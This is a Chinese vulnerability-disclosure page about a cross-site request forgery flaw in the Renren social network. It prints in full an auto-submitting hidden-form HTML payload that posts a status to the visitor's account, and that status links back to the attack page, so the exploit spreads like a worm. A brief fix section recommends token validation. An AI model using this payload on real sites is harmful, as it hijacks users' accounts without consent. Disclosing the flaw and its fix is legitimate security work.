手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >人人网CSRF漏洞曝光及修复方案
人人网CSRF漏洞曝光及修复方案
摘要:脚本页面http://bookman.sinaapp.com/doover.php,访问该页面后会发送一条状态“已经结束了,这是...

脚本页面http://bookman.sinaapp.com/doover.php,访问该页面后会发送一条状态“已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php”

详细说明:

看了下那个链接的源代码,是通过人人逛街的接口提交的。

接口地址http://j.renren.com/publisher/status,只要POST一个参数content到接口即可。

这个页面post的content内容就是“已经结束了,这是我的自白XXXX”。

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>爱你的说</title>

</head>

<body>

<iframe name="destination" width="0" height="0"></iframe>

数字bookman爱你。欢迎访问“肖寒Bookman”的人人空间。

<div id="kokia" style="float:left;display:none;">

<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">

<input type="text" name="synsbcp" value="1"/>

<p>raw: <input type="text" name="content" value="已经结束了,这是我的自白,想明白原理的看我日志就好。http://bookman.sinaapp.com/doover.php"/></p>

<input type="submit" value="Submit" />

</form>

</div>

<script>

document.akiko.submit();

</script>

</body>

</html>

人人网CSRF漏洞曝光及修复方案1

修复方案:

人人比我懂的多。以前有次flash的类似的,传播是站内信吧。

补漏洞很简单,加一个token验证即可。

低级错误一枚,从网不行啊。

作者 leo108 AND 白熊一枚

【人人网CSRF漏洞曝光及修复方案】相关文章:

IPB2注入漏洞的深入利用

傲游浏览器命令执行漏洞介绍以及修复方案

网站受到XSS跨站点脚本攻击的分析及解决方法

搜狐微博的几处CSRF漏洞分析与解决方法

新浪微博及招聘的两个XSS漏洞分析与解决方法

FeiXun企业网站管理系统v2011上传漏洞通杀0day及

金山毒霸多个sql注入及XSS漏洞和修复

腾讯QQ空间的跨站漏洞介绍以及修复解决的方案(图)

又拍图片管家支付非法充值的漏洞分析及修复方法(图)

FTP客户端目录遍历漏洞可向任意位置写文件

精品推荐
分类导航